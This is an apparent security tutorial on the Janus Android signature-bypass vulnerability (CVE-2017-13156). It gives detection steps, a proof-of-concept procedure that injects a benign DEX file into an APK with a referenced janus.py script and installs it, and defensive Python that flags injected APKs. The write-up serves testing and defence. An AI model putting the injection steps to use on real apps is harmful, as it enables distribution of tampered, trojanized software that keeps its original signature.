Exploiting App Vulnerable To Janus (CVE-2017-13156)

A serious vulnerability in Android allows attackers to inject a malicious DEX (Dalvik Executable) file into an APK without invalidating the APK's code signature. The attack was named Janus, after the Roman god of duality.

  • Applications that support Android 5.0 – 8.0 AND are signed with only version 1 (JAR signing) of the code signing schemes are vulnerable to this attack.
  • Applications that support Android 5.0 – 7.0 AND are signed with version 1 plus version 2 and/or version 3 of the code signing schemes are vulnerable to this attack.

Detection

To test if an application is vulnerable to this attack:

  • Decode the app using apktool
    • apktool d -o App base.apk
  • Check the minimum SDK version for the app
    • cat App/apktool.yml | grep minSdkVersion
    • If the minSdkVersion is 21 through 26 (inclusive), continue. Otherwise, the app is not vulnerable and there is no need to continue the checks.
  • Check the signing scheme(s) in use
    • apksigner verify --verbose base.apk
    • Verify that the v1 scheme is in use.
    • If v2 and/or v3 are also in use, confirm that the minSdkVersion is 21 through 24. When v2/v3 is also in use, only Android 5.0 – 7.0 are vulnerable!

Proof Of Concept Exploit

Ideally, a real malicious DEX file would be created and injected into the APK. For our purposes, we can simply take any DEX file and inject it. If the injected APK installs and functions normally, we can assume that the exploit is working.

  • The first thing you need is a DEX file to inject into the app. Since we aren’t concerned with malicious behavior, we can use any DEX file (or compile a new one). The easiest way is to grab another app’s APK and pull out one of its classes.dex files.
    • apktool -s d -o App base.apk && cp App/classes.dex .
  • Record the certificate digests of the original APK's code signature
    • apksigner verify --print-certs app.apk
  • Use the janus.py script to inject the classes.dex file into the test app
    • python janus.py classes.dex app.apk app-injected.apk
    • Usage: janus.py {file to inject} {original APK} {injected APK}
  • Once the file is injected, verify that the certificate digests of the injected APK's code signature are the same as they were before
    • apksigner verify --print-certs app-injected.apk
  • Install the app onto your device
    • adb install app-injected.apk
  • Launch the app, and use it as you normally would
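The two checks above (the minSdkVersion/signing-scheme triage from the Detection section and the "did the signature survive injection" step of the proof of concept) can be automated from the defender's side. The following is an added example, not code from the article or from the janus-toolkit: it parses constructed stand-ins for apktool.yml and `apksigner verify --verbose` output (layouts assumed from those tools), applies the article's triage rules, and flags a file that begins with the DEX magic while still ending in a valid ZIP central directory, which is the shape a Janus-injected APK has because the DEX is prepended to the ZIP.

```python
import io
import re
import zipfile

# Constructed sample inputs (not captured from the article's app); the layouts assume
# apktool's apktool.yml and the output of `apksigner verify --verbose`.
APKTOOL_YML = """!!brut.androlib.meta.MetaInfo
sdkInfo:
  minSdkVersion: '21'
  targetSdkVersion: '27'
"""
APKSIGNER_OUT = """Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): true
Verified using v3 scheme (APK Signature Scheme v3): false
"""

def parse_min_sdk(apktool_yml: str) -> int:
    """Extract minSdkVersion from apktool.yml (apktool may quote the value)."""
    m = re.search(r"minSdkVersion:\s*'?(\d+)'?", apktool_yml)
    if not m:
        raise ValueError("minSdkVersion not found in apktool.yml")
    return int(m.group(1))

def parse_schemes(apksigner_out: str) -> set:
    """Return the set of signature scheme versions apksigner verified as true."""
    found = re.findall(r"Verified using v(\d) scheme[^:]*: (true|false)", apksigner_out)
    return {int(v) for v, ok in found if ok == "true"}

def janus_exposure(min_sdk: int, schemes: set) -> str:
    """Article's triage: v1-only is exposed at API 21-26 (5.0-8.0); v1 plus v2/v3 only at API 21-24 (5.0-7.0)."""
    if 1 not in schemes:
        return "not vulnerable: no v1 (JAR) signature"
    hi = 24 if schemes & {2, 3} else 26
    return "vulnerable" if 21 <= min_sdk <= hi else "not vulnerable"

DEX_MAGIC = b"dex\n"  # a normal APK begins with the ZIP local header b"PK\x03\x04"
def looks_janus_injected(apk_bytes: bytes) -> bool:
    """Janus prepends a DEX to the ZIP: the file opens with the DEX magic yet still
    ends in a valid ZIP central directory, which is what Android's ZIP parser reads."""
    return apk_bytes.startswith(DEX_MAGIC) and zipfile.is_zipfile(io.BytesIO(apk_bytes))

def build_sample_apk() -> bytes:
    """Constructed stand-in for an APK: a tiny ZIP with a placeholder classes.dex entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", b"dex\n035\0" + b"\0" * 24)
        z.writestr("AndroidManifest.xml", b"<manifest/>")
    return buf.getvalue()
```

Running `looks_janus_injected` over APKs pulled from a device (`adb pull`) or a distribution channel gives a cheap first-pass indicator; a hit should then be confirmed with `apksigner verify --verbose`, which still reports the v1 signature as valid on an injected file.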

References

https://medium.com/mobis3c/exploiting-apps-vulnerable-to-janus-cve-2017-13156-8d52c983b4e0

https://packetstormsecurity.com/files/155189/Android-Janus-APK-Signature-Bypass.html

https://github.com/giacomoferretti/janus-toolkit/blob/master/python3/janus.py